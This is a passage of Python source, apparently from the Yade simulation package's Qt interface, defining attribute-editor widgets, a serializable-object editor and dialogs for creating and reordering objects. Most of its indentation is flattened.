The class hierarchy is crawled upwards to find out in which parent class is *attr* defined,
	so that the href target is a valid link. In that case, only single inheritance is assumed and
the first class from the top defining *attr* is used.
:param ser: object of class deriving from :yref:`Serializable`, or string; if string, *attr* must be empty.
	:param attr: name of the attribute to link to; if empty, link to the class itself is created.
:param text: visible text of the hyperlink; if not given, either class name or attribute name without class name (when *attr* is not given) is used.
:returns: HTML with the hyperref.
"""
# klass is a class name given as string
if isinstance(ser,str):
		if attr: raise ValueError("When *ser* is a string, *attr* must be empty (only class link can be created)") # InvalidArgument was undefined here
return makeWrapperHref(text if text else ser,ser)
# klass is a type object
if attr:
klass=ser.__class__
while attr in dir(klass.__bases__[0]): klass=klass.__bases__[0]
if not text: text=attr
else:
klass=ser.__class__
if not text: text=klass.__name__
return makeWrapperHref(text,klass.__name__,attr,static=(attr and getattr(klass,attr)==getattr(ser,attr)))
class AttrEditor():
"""Abstract base class handing some aspects common to all attribute editors.
Holds exacly one attribute which is updated whenever it changes."""
def __init__(self,getter=None,setter=None):
self.getter,self.setter=getter,setter
self.hot,self.focused=False,False
self.widget=None
def refresh(self): pass
def update(self): pass
def isHot(self,hot=True):
"Called when the widget gets focus; mark it hot, change colors etc."
if hot==self.hot: return
self.hot=hot
if hot: self.setStyleSheet('QWidget { background: red }')
else: self.setStyleSheet('QWidget { background: none }')
def sizeHint(self): return QSize(150,12)
def trySetter(self,val):
try: self.setter(val)
except AttributeError: self.setEnabled(False)
self.isHot(False)
class AttrEditor_Bool(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.checkBox=QCheckBox(self)
lay=QVBoxLayout(self); lay.setSpacing(0); lay.setMargin(0); lay.addStretch(1); lay.addWidget(self.checkBox); lay.addStretch(1)
self.checkBox.clicked.connect(self.update)
def refresh(self): self.checkBox.setChecked(self.getter())
def update(self): self.trySetter(self.checkBox.isChecked())
class AttrEditor_Int(AttrEditor,QSpinBox):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QSpinBox.__init__(self,parent)
self.setRange(int(-1e9),int(1e9)); self.setSingleStep(1);
self.valueChanged.connect(self.update)
def refresh(self): self.setValue(self.getter())
def update(self): self.trySetter(self.value())
class AttrEditor_Str(AttrEditor,QLineEdit):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QLineEdit.__init__(self,parent)
self.textEdited.connect(self.isHot)
self.selectionChanged.connect(self.isHot)
self.editingFinished.connect(self.update)
def refresh(self): self.setText(self.getter())
def update(self): self.trySetter(str(self.text()))
class AttrEditor_Float(AttrEditor,QLineEdit):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QLineEdit.__init__(self,parent)
self.textEdited.connect(self.isHot)
self.selectionChanged.connect(self.isHot)
self.editingFinished.connect(self.update)
def refresh(self):
self.setText(str(self.getter()));
if True or not self.hasFocus(): self.home(False)
def update(self):
try: self.trySetter(float(self.text()))
except ValueError: self.refresh()
class AttrEditor_Quaternion(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.grid=QHBoxLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for i in range(4):
if i==3:
f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4) # add vertical divider (axis | angle)
self.grid.addWidget(f)
w=QLineEdit('')
self.grid.addWidget(w);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
val=self.getter(); axis,angle=val.toAxisAngle()
for i in (0,1,2,4):
w=self.grid.itemAt(i).widget(); w.setText(str(axis[i] if i<3 else angle));
if True or not w.hasFocus(): w.home(False)
def update(self):
try:
x=[float((self.grid.itemAt(i).widget().text())) for i in (0,1,2,4)]
		except ValueError: self.refresh(); return # bad input: revert widget contents and bail out
q=Quaternion(Vector3(x[0],x[1],x[2]),x[3]); q.normalize() # from axis-angle
self.trySetter(q)
def setFocus(self): self.grid.itemAt(0).widget().setFocus()
class AttrEditor_Se3(AttrEditor,QFrame):
def __init__(self,parent,getter,setter):
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(2),range(5)): # one additional column for vertical line in quaternion
if (row,col)==(0,3): continue
if (row,col)==(0,4): self.grid.addWidget(QLabel(u'←<i>pos</i> ↙<i>ori</i>',self),row,col); continue
if (row,col)==(1,3):
f=QFrame(self); f.setFrameShape(QFrame.VLine); f.setFrameShadow(QFrame.Sunken); f.setFixedWidth(4); self.grid.addWidget(f,row,col); continue
w=QLineEdit('')
self.grid.addWidget(w,row,col);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
pos,ori=self.getter(); axis,angle=ori.toAxisAngle()
for i in (0,1,2,4):
w=self.grid.itemAtPosition(1,i).widget(); w.setText(str(axis[i] if i<3 else angle));
if True or not w.hasFocus(): w.home(False)
for i in (0,1,2):
w=self.grid.itemAtPosition(0,i).widget(); w.setText(str(pos[i]));
if True or not w.hasFocus(): w.home(False)
def update(self):
try:
q=[float((self.grid.itemAtPosition(1,i).widget().text())) for i in (0,1,2,4)]
v=[float((self.grid.itemAtPosition(0,i).widget().text())) for i in (0,1,2)]
		except ValueError: self.refresh(); return # bad input: revert widget contents and bail out
qq=Quaternion(Vector3(q[0],q[1],q[2]),q[3]); qq.normalize() # from axis-angle
self.trySetter((v,qq))
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_MatrixX(AttrEditor,QFrame):
def __init__(self,parent,getter,setter,rows,cols,idxConverter):
'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []'
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.rows,self.cols=rows,cols
self.idxConverter=idxConverter
self.setContentsMargins(0,0,0,0)
val=self.getter()
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=QLineEdit('')
self.grid.addWidget(w,row,col);
w.textEdited.connect(self.isHot)
w.selectionChanged.connect(self.isHot)
w.editingFinished.connect(self.update)
def refresh(self):
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
w.setText(str(val[self.idxConverter(row,col)]))
			if True or not w.hasFocus(): w.home(False) # make the left-most part visible, if the text is wider than the widget
def update(self):
try:
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
if w.isModified(): val[self.idxConverter(row,col)]=float(w.text())
logging.debug('setting'+str(val))
self.trySetter(val)
except ValueError: self.refresh()
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_MatrixXi(AttrEditor,QFrame):
def __init__(self,parent,getter,setter,rows,cols,idxConverter):
'idxConverter converts row,col tuple to either (row,col), (col) etc depending on what access is used for []'
AttrEditor.__init__(self,getter,setter)
QFrame.__init__(self,parent)
self.rows,self.cols=rows,cols
self.idxConverter=idxConverter
self.setContentsMargins(0,0,0,0)
self.grid=QGridLayout(self); self.grid.setSpacing(0); self.grid.setMargin(0)
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=QSpinBox()
w.setRange(int(-1e9),int(1e9)); w.setSingleStep(1);
self.grid.addWidget(w,row,col);
self.refresh() # refresh before connecting signals!
for row,col in itertools.product(range(self.rows),range(self.cols)):
self.grid.itemAtPosition(row,col).widget().valueChanged.connect(self.update)
def refresh(self):
val=self.getter()
for row,col in itertools.product(range(self.rows),range(self.cols)):
self.grid.itemAtPosition(row,col).widget().setValue(val[self.idxConverter(row,col)])
def update(self):
val=self.getter(); modified=False
for row,col in itertools.product(range(self.rows),range(self.cols)):
w=self.grid.itemAtPosition(row,col).widget()
if w.value()!=val[self.idxConverter(row,col)]:
modified=True; val[self.idxConverter(row,col)]=w.value()
if not modified: return
logging.debug('setting '+str(val))
self.trySetter(val)
def setFocus(self): self.grid.itemAtPosition(0,0).widget().setFocus()
class AttrEditor_Vector6i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,6,lambda r,c:c)
class AttrEditor_Vector3i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,3,lambda r,c:c)
class AttrEditor_Vector2i(AttrEditor_MatrixXi):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixXi.__init__(self,parent,getter,setter,1,2,lambda r,c:c)
class AttrEditor_Vector6(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,6,lambda r,c:c)
class AttrEditor_Vector3(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,3,lambda r,c:c)
class AttrEditor_Vector2(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,1,2,lambda r,c:c)
class AttrEditor_Matrix3(AttrEditor_MatrixX):
def __init__(self,parent,getter,setter):
AttrEditor_MatrixX.__init__(self,parent,getter,setter,3,3,lambda r,c:(r,c))
class Se3FakeType: pass
_fundamentalEditorMap={bool:AttrEditor_Bool,str:AttrEditor_Str,int:AttrEditor_Int,float:AttrEditor_Float,Quaternion:AttrEditor_Quaternion,Vector2:AttrEditor_Vector2,Vector3:AttrEditor_Vector3,Vector6:AttrEditor_Vector6,Matrix3:AttrEditor_Matrix3,Vector6i:AttrEditor_Vector6i,Vector3i:AttrEditor_Vector3i,Vector2i:AttrEditor_Vector2i,Se3FakeType:AttrEditor_Se3}
_fundamentalInitValues={bool:True,str:'',int:0,float:0.0,Quaternion:Quaternion((0,1,0),0.0),Vector3:Vector3.Zero,Matrix3:Matrix3.Zero,Vector6:Vector6.Zero,Vector6i:Vector6i.Zero,Vector3i:Vector3i.Zero,Vector2i:Vector2i.Zero,Vector2:Vector2.Zero,Se3FakeType:(Vector3.Zero,Quaternion((0,1,0),0.0))}
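# Dispatch sketch (added summary of the two maps above): mkWidget() below looks the
# attribute's python type up in _fundamentalEditorMap to pick an editor class, and
# NewFundamentalDialog uses _fundamentalInitValues the same way to seed a default, e.g.
#     _fundamentalEditorMap[Vector3]   # -> AttrEditor_Vector3
#     _fundamentalInitValues[Vector3]  # -> Vector3.Zero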
class SerQLabel(QLabel):
def __init__(self,parent,label,tooltip,path):
QLabel.__init__(self,parent)
self.path=path
self.setText(label)
if tooltip or path: self.setToolTip(('<b>'+path+'</b><br>' if self.path else '')+(tooltip if tooltip else ''))
self.linkActivated.connect(yade.qt.openUrl)
def mousePressEvent(self,event):
if event.button()!=Qt.MidButton:
event.ignore(); return
# middle button clicked: copy this attribute's path to the clipboard (and the X11 selection below)
cb=QApplication.clipboard()
cb.setText(self.path,mode=QClipboard.Clipboard)
cb.setText(self.path,mode=QClipboard.Selection) # X11 global selection buffer
event.accept()
class SerializableEditor(QFrame):
"Class displaying and modifying serializable attributes of a yade object."
import collections
import logging
# each attribute has one entry associated with itself
class EntryData:
def __init__(self,name,T,flags=0):
self.name,self.T,self.flags=name,T,flags
self.lineNo,self.widget=None,None
def __init__(self,ser,parent=None,ignoredAttrs=set(),showType=False,path=None):
"Construct window, *ser* is the object we want to show."
QtGui.QFrame.__init__(self,parent)
self.ser=ser
self.path=(ser.label if (hasattr(ser,'label') and ser.label) else path)
self.showType=showType
self.hot=False
self.entries=[]
self.ignoredAttrs=ignoredAttrs
logging.debug('New Serializable of type %s'%ser.__class__.__name__)
self.setWindowTitle(str(ser))
self.mkWidgets()
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(500)
def getListTypeFromDocstring(self,attr):
"Guess type of array by scanning docstring for :yattrtype: and parsing its argument; ugly, but works."
doc=getattr(self.ser.__class__,attr).__doc__
if doc is None:
logging.error("Attribute %s has no docstring."%attr)
return None
m=re.search(r':yattrtype:`([^`]*)`',doc)
if not m:
logging.error("Attribute %s does not contain :yattrtype:`....` (docstring is '%s'"%(attr,doc))
return None
cxxT=m.group(1)
logging.debug('Got type "%s" from :yattrtype:'%cxxT)
def vecTest(T,cxxT):
#regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(std\s*::)?\s*('+T+r')\s*>\s*$'
regexp=r'^\s*(std\s*::)?\s*vector\s*<\s*(shared_ptr\s*<\s*)?\s*(std\s*::)?\s*('+T+r')(\s*>)?\s*>\s*$'
m=re.match(regexp,cxxT)
return m
vecMap={
'bool':bool,'int':int,'long':int,'Body::id_t':long,'size_t':long,
'Real':float,'float':float,'double':float,
'Vector6r':Vector6,'Vector6i':Vector6i,'Vector3i':Vector3i,'Vector2r':Vector2,'Vector2i':Vector2i,
'Vector3r':Vector3,'Matrix3r':Matrix3,'Se3r':Se3FakeType,
'string':str,
#'BodyCallback':BodyCallback,
'IntrCallback':IntrCallback,'BoundFunctor':BoundFunctor,'IGeomFunctor':IGeomFunctor,'IPhysFunctor':IPhysFunctor,'LawFunctor':LawFunctor,'KinematicEngine':KinematicEngine,
'GlShapeFunctor':GlShapeFunctor,'GlStateFunctor':GlStateFunctor,'GlIGeomFunctor':GlIGeomFunctor,'GlIPhysFunctor':GlIPhysFunctor,'GlBoundFunctor':GlBoundFunctor,'GlExtraDrawer':GlExtraDrawer
}
for T,ret in vecMap.items():
if vecTest(T,cxxT):
logging.debug("Got type %s from cxx type %s"%(repr(ret),cxxT))
return (ret,)
logging.error("Unable to guess python type from cxx type '%s'"%cxxT)
return None
def mkAttrEntries(self):
if self.ser is None: return
try:
d=self.ser.dict()
except TypeError:
logging.error('TypeError when getting attributes of '+str(self.ser)+', skipping.')
import traceback
traceback.print_exc()
return # cannot enumerate the attributes, leave the editor empty
attrs=d.keys(); attrs.sort()
for attr in attrs:
val=getattr(self.ser,attr) # get the value using serattr, as it might be different from what the dictionary provides (e.g. Body.blockedDOFs)
t=None
doc=getattr(self.ser.__class__,attr).__doc__ or '' # guard against attributes without a docstring
if '|yhidden|' in doc: continue
if attr in self.ignoredAttrs: continue
if isinstance(val,list):
t=self.getListTypeFromDocstring(attr)
if not t and len(val)>0: t=(val[0].__class__,) # 1-tuple is list of the contained type; only usable when the list is non-empty
#if not t: raise RuntimeError('Unable to guess type of '+str(self.ser)+'.'+attr)
# hack for Se3, which is returned as (Vector3,Quaternion) in python
elif isinstance(val,tuple) and len(val)==2 and val[0].__class__==Vector3 and val[1].__class__==Quaternion: t=Se3FakeType
else: t=val.__class__
match=re.search(r':yattrflags:`\s*([0-9]+)\s*`',doc) # non-empty attribute
flags=int(match.group(1)) if match else 0
#logging.debug('Attr %s is of type %s'%(attr,((t[0].__name__,) if isinstance(t,tuple) else t.__name__)))
self.entries.append(self.EntryData(name=attr,T=t,flags=flags)) # pass the parsed flags along so read-only attributes get disabled widgets
def getDocstring(self,attr=None):
"If attr is *None*, return docstring of the Serializable itself"
doc=(getattr(self.ser.__class__,attr).__doc__ if attr else self.ser.__class__.__doc__)
if not doc: return ''
doc=re.sub(':y(attrtype|default|attrflags):`[^`]*`','',doc)
statAttr=re.compile('^.. ystaticattr::.*$',re.MULTILINE|re.DOTALL)
doc=re.sub(statAttr,'',doc) # static classes have their proper docs at the beginning, discard static member docs
# static: attribute of the type is the same object as attribute of the instance
# in that case, get docstring from the class documentation by parsing it
if attr and getattr(self.ser.__class__,attr)==getattr(self.ser,attr): doc=self.getStaticAttrDocstring(attr)
doc=re.sub(':yref:`([^`]*)`','\\1',doc)
import textwrap
wrapper=textwrap.TextWrapper(replace_whitespace=False)
return wrapper.fill(textwrap.dedent(doc))
def getStaticAttrDocstring(self,attr):
ret=''; c=self.ser.__class__
while hasattr(c,attr) and hasattr(c.__base__,attr): c=c.__base__
start='.. ystaticattr:: %s.%s('%(c.__name__,attr)
if start in c.__doc__:
ll=c.__doc__.split('\n')
for i in range(len(ll)):
if ll[i].startswith(start): break
for i in range(i+1,len(ll)):
if len(ll[i])>0 and ll[i][0] not in ' \t': break
ret+=ll[i]
return ret
else: return '[no documentation found]'
def mkWidget(self,entry):
if not entry.T: return None
# single fundamental object
Klass=_fundamentalEditorMap.get(entry.T,None)
getter,setter=lambda: getattr(self.ser,entry.name), lambda x: setattr(self.ser,entry.name,x)
if Klass:
widget=Klass(self,getter=getter,setter=setter)
widget.setFocusPolicy(Qt.StrongFocus)
if (entry.flags & AttrFlags.readonly): widget.setEnabled(False)
return widget
# sequences
if entry.T.__class__==tuple:
assert(len(entry.T)==1) # we don't handle tuples of other lengths
# sequence of serializables
T=entry.T[0]
if (issubclass(T,Serializable) or T==Serializable):
widget=SeqSerializable(self,getter,setter,T,path=(self.path+'.'+entry.name if self.path else None),shrink=True)
return widget
if (T in _fundamentalEditorMap):
widget=SeqFundamentalEditor(self,getter,setter,T)
return widget
return None
# a serializable
if issubclass(entry.T,Serializable) or entry.T==Serializable:
obj=getattr(self.ser,entry.name)
if hasattr(obj,'label') and obj.label: path=obj.label
elif self.path: path=self.path+'.'+entry.name
else: path=None
widget=SerializableEditor(obj,parent=self,showType=self.showType,path=path) # use the label-aware path computed above
widget.setFrameShape(QFrame.Box); widget.setFrameShadow(QFrame.Raised); widget.setLineWidth(1)
return widget
return None
def mkWidgets(self):
self.mkAttrEntries()
grid=QFormLayout()
grid.setContentsMargins(2,2,2,2)
grid.setVerticalSpacing(0)
grid.setLabelAlignment(Qt.AlignRight)
if self.showType:
lab=SerQLabel(self,makeSerializableLabel(self.ser,addr=True,href=True),tooltip=self.getDocstring(),path=self.path)
lab.setFrameShape(QFrame.Box); lab.setFrameShadow(QFrame.Sunken); lab.setLineWidth(2); lab.setAlignment(Qt.AlignHCenter); lab.linkActivated.connect(yade.qt.openUrl)
grid.setWidget(0,QFormLayout.SpanningRole,lab)
for entry in self.entries:
entry.widget=self.mkWidget(entry)
objPath=(self.path+'.'+entry.name) if self.path else None
label=SerQLabel(self,serializableHref(self.ser,entry.name),tooltip=self.getDocstring(entry.name),path=objPath)
grid.addRow(label,entry.widget if entry.widget else QLabel('<i>unhandled type</i>'))
self.setLayout(grid)
self.refreshEvent()
def refreshEvent(self):
for e in self.entries:
if e.widget and not e.widget.hot: e.widget.refresh()
def refresh(self): pass
def makeSerializableLabel(ser,href=False,addr=True,boldHref=True,num=-1,count=-1):
ret=u''
if num>=0:
if count>=0: ret+=u'%d/%d. '%(num,count)
else: ret+=u'%d. '%num
if href: ret+=(u' <b>' if boldHref else u' ')+serializableHref(ser)+(u'</b> ' if boldHref else u' ')
else: ret+=ser.__class__.__name__+' '
if hasattr(ser,'label') and ser.label: ret+=u' “'+unicode(ser.label)+u'”'
# do not show address if there is a label already
elif addr:
import re
ss=unicode(ser); m=re.match(u'<(.*) instance at (0x.*)>',ss)
if m: ret+=m.group(2)
else: logging.warning(u"Serializable converted to str ('%s') does not contain 'instance at 0x…'"%ss)
return ret
class SeqSerializableComboBox(QFrame):
def __init__(self,parent,getter,setter,serType,path=None,shrink=False):
QFrame.__init__(self,parent)
self.getter,self.setter,self.serType,self.path,self.shrink=getter,setter,serType,path,shrink
self.layout=QVBoxLayout(self)
topLineFrame=QFrame(self)
topLineLayout=QHBoxLayout(topLineFrame);
for l in self.layout, topLineLayout: l.setSpacing(0); l.setContentsMargins(0,0,0,0)
topLineFrame.setLayout(topLineLayout)
buttons=(self.newButton,self.killButton,self.upButton,self.downButton)=[QPushButton(label,self) for label in (u'☘',u'☠',u'↑',u'↓')]
buttonSlots=(self.newSlot,self.killSlot,self.upSlot,self.downSlot) # same order as buttons
for b in buttons: b.setStyleSheet('QPushButton { font-size: 15pt; }'); b.setFixedWidth(30); b.setFixedHeight(30)
self.combo=QComboBox(self)
self.combo.setSizeAdjustPolicy(QComboBox.AdjustToContents)
for w in buttons[0:2]+[self.combo,]+buttons[2:4]: topLineLayout.addWidget(w)
self.layout.addWidget(topLineFrame) # nested layout
self.scroll=QScrollArea(self); self.scroll.setWidgetResizable(True)
self.layout.addWidget(self.scroll)
self.seqEdit=None # currently edited serializable
self.setLayout(self.layout)
self.hot=None # API compat with SerializableEditor
self.setFrameShape(QFrame.Box); self.setFrameShadow(QFrame.Raised); self.setLineWidth(1)
# signals
for b,slot in zip(buttons,buttonSlots): b.clicked.connect(slot)
self.combo.currentIndexChanged.connect(self.comboIndexSlot)
self.refreshEvent()
# periodic refresh
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(1000) # 1s should be enough
#print 'SeqSerializable path is',self.path
def comboIndexSlot(self,ix): # different seq item selected
currSeq=self.getter();
if len(currSeq)==0: ix=-1
logging.debug('%s comboIndexSlot len=%d, ix=%d'%(self.serType.__name__,len(currSeq),ix))
self.downButton.setEnabled(ix<len(currSeq)-1)
self.upButton.setEnabled(ix>0)
self.combo.setEnabled(ix>=0)
if ix>=0:
ser=currSeq[ix]
self.seqEdit=SerializableEditor(ser,parent=self,showType=seqSerializableShowType,path=(self.path+'['+str(ix)+']') if self.path else None)
self.scroll.setWidget(self.seqEdit)
if self.shrink:
self.sizeHint=lambda: QSize(100,1000)
self.scroll.sizeHint=lambda: QSize(100,1000)
self.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding)
self.scroll.sizePolicy().setVerticalPolicy(QSizePolicy.Expanding)
self.setMinimumHeight(min(300,self.seqEdit.height()+self.combo.height()+10))
self.setMaximumHeight(100000)
self.scroll.setMaximumHeight(100000)
else:
self.scroll.setWidget(QFrame())
if self.shrink:
self.setMaximumHeight(self.combo.height()+10);
self.scroll.setMaximumHeight(0)
def serLabel(self,ser,i=-1):
return ('' if i<0 else str(i)+'. ')+str(ser)[1:-1].replace('instance at ','')
def refreshEvent(self,forceIx=-1):
currSeq=self.getter()
comboEnabled=self.combo.isEnabled()
if comboEnabled and len(currSeq)==0: self.comboIndexSlot(-1) # force refresh, otherwise would not happen from the initially empty state
ix,cnt=self.combo.currentIndex(),self.combo.count()
# serializable currently being edited (which can be absent) or the one of which index is forced
ser=(self.seqEdit.ser if self.seqEdit else None) if forceIx<0 else currSeq[forceIx]
if comboEnabled and len(currSeq)==cnt and (ix<0 or ser==currSeq[ix]): return
if not comboEnabled and len(currSeq)==0: return
logging.debug(self.serType.__name__+' rebuilding list from scratch')
self.combo.clear()
if len(currSeq)>0:
prevIx=-1
for i,s in enumerate(currSeq):
self.combo.addItem(makeSerializableLabel(s,num=i,count=len(currSeq),addr=False))
if s==ser: prevIx=i
if forceIx>=0: newIx=forceIx # force the index (used from newSlot to make the new element active)
elif prevIx>=0: newIx=prevIx # if found what was active before, use it
elif ix>=0: newIx=ix # otherwise use the previous index (e.g. after deletion)
else: newIx=0 # fallback to 0
logging.debug('%s setting index %d'%(self.serType.__name__,newIx))
self.combo.setCurrentIndex(newIx)
else:
logging.debug('%s EMPTY, setting index 0'%(self.serType.__name__))
self.combo.setCurrentIndex(-1)
self.killButton.setEnabled(len(currSeq)>0)
def newSlot(self):
dialog=NewSerializableDialog(self,self.serType.__name__)
if not dialog.exec_(): return # cancelled
ser=dialog.result()
ix=self.combo.currentIndex()
currSeq=self.getter(); currSeq.insert(ix,ser); self.setter(currSeq)
logging.debug('%s new item created at index %d'%(self.serType.__name__,ix))
self.refreshEvent(forceIx=ix)
def killSlot(self):
ix=self.combo.currentIndex()
currSeq=self.getter(); del currSeq[ix]; self.setter(currSeq)
self.refreshEvent()
def upSlot(self):
i=self.combo.currentIndex()
assert(i>0)
currSeq=self.getter();
prev,curr=currSeq[i-1:i+1]; currSeq[i-1],currSeq[i]=curr,prev; self.setter(currSeq)
self.refreshEvent(forceIx=i-1)
def downSlot(self):
i=self.combo.currentIndex()
currSeq=self.getter(); assert(i<len(currSeq)-1);
curr,nxt=currSeq[i:i+2]; currSeq[i],currSeq[i+1]=nxt,curr; self.setter(currSeq)
self.refreshEvent(forceIx=i+1)
def refresh(self): pass # API compat with SerializableEditor
SeqSerializable=SeqSerializableComboBox
class NewFundamentalDialog(QDialog):
def __init__(self,parent,attrName,typeObj,typeStr):
QDialog.__init__(self,parent)
self.setWindowTitle('%s (type %s)'%(attrName,typeStr))
self.layout=QVBoxLayout(self)
self.scroll=QScrollArea(self)
self.scroll.setWidgetResizable(True)
self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel);
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout.addWidget(self.scroll)
self.layout.addWidget(self.buttons)
self.setWindowModality(Qt.WindowModal)
class FakeObjClass: pass
self.fakeObj=FakeObjClass()
self.attrName=attrName
Klass=_fundamentalEditorMap.get(typeObj,None)
initValue=_fundamentalInitValues.get(typeObj,typeObj())
setattr(self.fakeObj,attrName,initValue)
if Klass:
# wrap the scratch object in getter/setter callables, matching the AttrEditor API used everywhere else
self.widget=Klass(None,getter=lambda: getattr(self.fakeObj,attrName),setter=lambda x: setattr(self.fakeObj,attrName,x))
self.scroll.setWidget(self.widget)
self.scroll.show()
self.widget.refresh()
else: raise RuntimeError("Unable to construct new dialog for type %s"%(typeStr))
def result(self):
self.widget.update()
return getattr(self.fakeObj,self.attrName)
class NewSerializableDialog(QDialog):
def __init__(self,parent,baseClassName,includeBase=True):
import yade.system
QDialog.__init__(self,parent)
self.setWindowTitle('Create new object of type %s'%baseClassName)
self.layout=QVBoxLayout(self)
self.combo=QComboBox(self)
childs=list(yade.system.childClasses(baseClassName,includeBase=False)); childs.sort()
if includeBase:
self.combo.addItem(baseClassName)
self.combo.insertSeparator(1000)
self.combo.addItems(childs)
self.combo.currentIndexChanged.connect(self.comboSlot)
self.scroll=QScrollArea(self)
self.scroll.setWidgetResizable(True)
self.buttons=QDialogButtonBox(QDialogButtonBox.Ok|QDialogButtonBox.Cancel);
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.layout.addWidget(self.combo)
self.layout.addWidget(self.scroll)
self.layout.addWidget(self.buttons)
self.ser=None
self.combo.setCurrentIndex(0); self.comboSlot(0)
self.setWindowModality(Qt.WindowModal)
def comboSlot(self,index):
item=str(self.combo.itemText(index))
self.ser=eval(item+'()')
self.scroll.setWidget(SerializableEditor(self.ser,self.scroll,showType=True))
self.scroll.show()
def result(self): return self.ser
def sizeHint(self): return QSize(180,400)
class SeqFundamentalEditor(QFrame):
def __init__(self,parent,getter,setter,itemType):
QFrame.__init__(self,parent)
self.getter,self.setter,self.itemType=getter,setter,itemType
self.layout=QVBoxLayout()
topLineFrame=QFrame(self); topLineLayout=QHBoxLayout(topLineFrame)
self.form=QFormLayout()
self.form.setContentsMargins(0,0,0,0)
self.form.setVerticalSpacing(0)
self.form.setLabelAlignment(Qt.AlignLeft)
self.formFrame=QFrame(self); self.formFrame.setLayout(self.form)
self.layout.addWidget(self.formFrame)
self.setLayout(self.layout)
# SerializableEditor API compat
self.hot=False
self.rebuild()
# periodic refresh
self.refreshTimer=QTimer(self)
self.refreshTimer.timeout.connect(self.refreshEvent)
self.refreshTimer.start(1000) # 1s should be enough
def contextMenuEvent(self, event):
index=self.localPositionToIndex(event.pos())
seq=self.getter()
if len(seq)==0: index=-1
field=self.form.itemAt(index,QFormLayout.LabelRole).widget() if index>=0 else None
menu=QMenu(self)
actNew,actKill,actUp,actDown=[menu.addAction(name) for name in (u'☘ New',u'☠ Remove',u'↑ Up',u'↓ Down')]
if index<0: [a.setEnabled(False) for a in (actKill,actUp,actDown)]
if index==len(seq)-1: actDown.setEnabled(False)
if index==0: actUp.setEnabled(False)
if field: field.setStyleSheet('QWidget { background: green }')
act=menu.exec_(self.mapToGlobal(event.pos()))
if field: field.setStyleSheet('QWidget { background: none }')
if not act: return
if act==actNew: self.newSlot(index)
elif act==actKill: self.killSlot(index)
elif act==actUp: self.upSlot(index)
elif act==actDown: self.downSlot(index)
def localPositionToIndex(self,pos):
gp=self.mapToGlobal(pos)
for row in range(self.form.count()/2):
w,i=self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole)
for wi in w.widget(),i.widget():
x0,y0,x1,y1=wi.geometry().getCoords(); globG=QRect(self.mapToGlobal(QPoint(x0,y0)),self.mapToGlobal(QPoint(x1,y1)))
if globG.contains(gp):
return row
return -1
def newSlot(self,i):
seq=self.getter();
seq.insert(i,_fundamentalInitValues.get(self.itemType,self.itemType()))
self.setter(seq)
self.rebuild()
def killSlot(self,i):
seq=self.getter(); assert(i<len(seq)); del seq[i]; self.setter(seq)
self.refreshEvent()
def upSlot(self,i):
seq=self.getter(); assert(0<i<len(seq));
prev,curr=seq[i-1:i+1]; seq[i-1],seq[i]=curr,prev; self.setter(seq)
self.refreshEvent(forceIx=i-1)
def downSlot(self,i):
seq=self.getter(); assert(i<len(seq)-1);
curr,nxt=seq[i:i+2]; seq[i],seq[i+1]=nxt,curr; self.setter(seq)
self.refreshEvent(forceIx=i+1)
def rebuild(self):
currSeq=self.getter()
# clear everything
rows=self.form.count()/2
for row in range(rows):
logging.debug('counts %d %d'%(self.form.rowCount(),self.form.count())) # stock logging has no trace(); use debug
for wi in self.form.itemAt(row,QFormLayout.FieldRole),self.form.itemAt(row,QFormLayout.LabelRole):
self.form.removeItem(wi)
logging.debug('deleting widget %s'%str(wi.widget()))
widget=wi.widget(); widget.hide(); del widget # for some reason, deleting does not make the thing disappear visually; hiding does, however
logging.debug('counts after %d %d'%(self.form.rowCount(),self.form.count()))
logging.debug('cleared')
